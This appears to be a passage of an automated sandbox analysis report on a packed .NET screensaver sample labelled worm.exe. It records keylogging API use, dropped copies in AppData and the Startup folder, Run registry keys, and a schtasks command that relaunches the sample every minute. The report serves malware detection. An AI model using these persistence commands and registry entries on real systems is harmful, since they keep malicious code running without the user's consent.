Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2720847952.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000000.1974894555.0000000000BB6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameworm.exeL vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdi.exel% vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeBinary or memory string: OriginalFilenameworm.exeL vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile read: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: unknownProcess created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdIJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c08e40ea-c13e-471a-97ce-fd966f32454cJump to behavior
Source: classification engineClassification label: mal100.adwa.evad.winEXE@10/11@3/3
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrMutant created: \Sessions\1\BaseNamedObjects\4LGIL4kGMXwd2NML
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Deployment.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb4v source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb$0<2a@ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb0_ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Windows.Forms.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb< source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb| source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 50D14BCC.cs.Net Code: _183F70EC
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.cs.Net Code: g System.Reflection.Assembly.Load(byte[])
Source: wininit.scr.0.dr, 50D14BCC.cs.Net Code: _183F70EC
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.cs.Net Code: g System.Reflection.Assembly.Load(byte[])
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.cs.Net Code: g System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144BC88 push eax; ret 0_2_0144BC8A
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD0BE8 push eax; mov dword ptr [esp], edx0_2_02DD0FCC
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD6296 push ebx; retf 0_2_02DD6298
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD416E push FFFFFF8Bh; iretd 0_2_02DD4170
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF848352E4B push ebx; ret 2_2_00007FF848352E5A
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: section name: .vmp0
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: section name: .vmp1
Source: wininit.scr.0.drStatic PE information: section name: .vmp0
Source: wininit.scr.0.drStatic PE information: section name: .vmp1
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: initial sampleStatic PE information: section name: .vmp1 entropy: 7.2244685170682175
Source: initial sampleStatic PE information: section name: .text entropy: 6.886643321135571
Source: initial sampleStatic PE information: section name: .vmp1 entropy: 7.2244685170682175
Source: initial sampleStatic PE information: section name: .text entropy: 6.886643321135571
Source: initial sampleStatic PE information: section name: .text entropy: 6.886643321135571
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, FCYuTLHTkyUIRojNPvQVdTyIIGLipwbnnDHKCapi.csHigh entropy of concatenated method names: 'GetAsyncKeyState', 'dar', 'Main', 'ecWolIeDJFQTiEFPYTwMfzSNCiqrpufZgKXWmqtkKZSCjlHjnCMguhUuRQsZrdhHhsmFCYuTLHTkyUIRojNPvQVdTy', 'Scatch', 'EBuNKhRbhdpGHcenLsWlSYrzpVQQPUFxFjKvMPSKiM', 'poakzdpoazkdpazodazopdkazdpkaz', 'RBLRNZpFMOXupTVCIbjYEzzyEovDTtsJyCtSvaYGuP', 'rxtGJYtuEOJmCUoICrXghfkVOVzNMcfiazOHrZbvYd', 'sYvOaOMGYVrbmrozRSnoxWDgvciCKzfabZePIQtV'
Source: wininit.scr.0.dr, FCYuTLHTkyUIRojNPvQVdTyIIGLipwbnnDHKCapi.csHigh entropy of concatenated method names: 'GetAsyncKeyState', 'dar', 'Main', 'ecWolIeDJFQTiEFPYTwMfzSNCiqrpufZgKXWmqtkKZSCjlHjnCMguhUuRQsZrdhHhsmFCYuTLHTkyUIRojNPvQVdTy', 'Scatch', 'EBuNKhRbhdpGHcenLsWlSYrzpVQQPUFxFjKvMPSKiM', 'poakzdpoazkdpazodazopdkazdpkaz', 'RBLRNZpFMOXupTVCIbjYEzzyEovDTtsJyCtSvaYGuP', 'rxtGJYtuEOJmCUoICrXghfkVOVzNMcfiazOHrZbvYd', 'sYvOaOMGYVrbmrozRSnoxWDgvciCKzfabZePIQtV'

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scrJump to dropped file

Boot Survival

barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StataJump to behavior
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scrJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StataJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StataJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
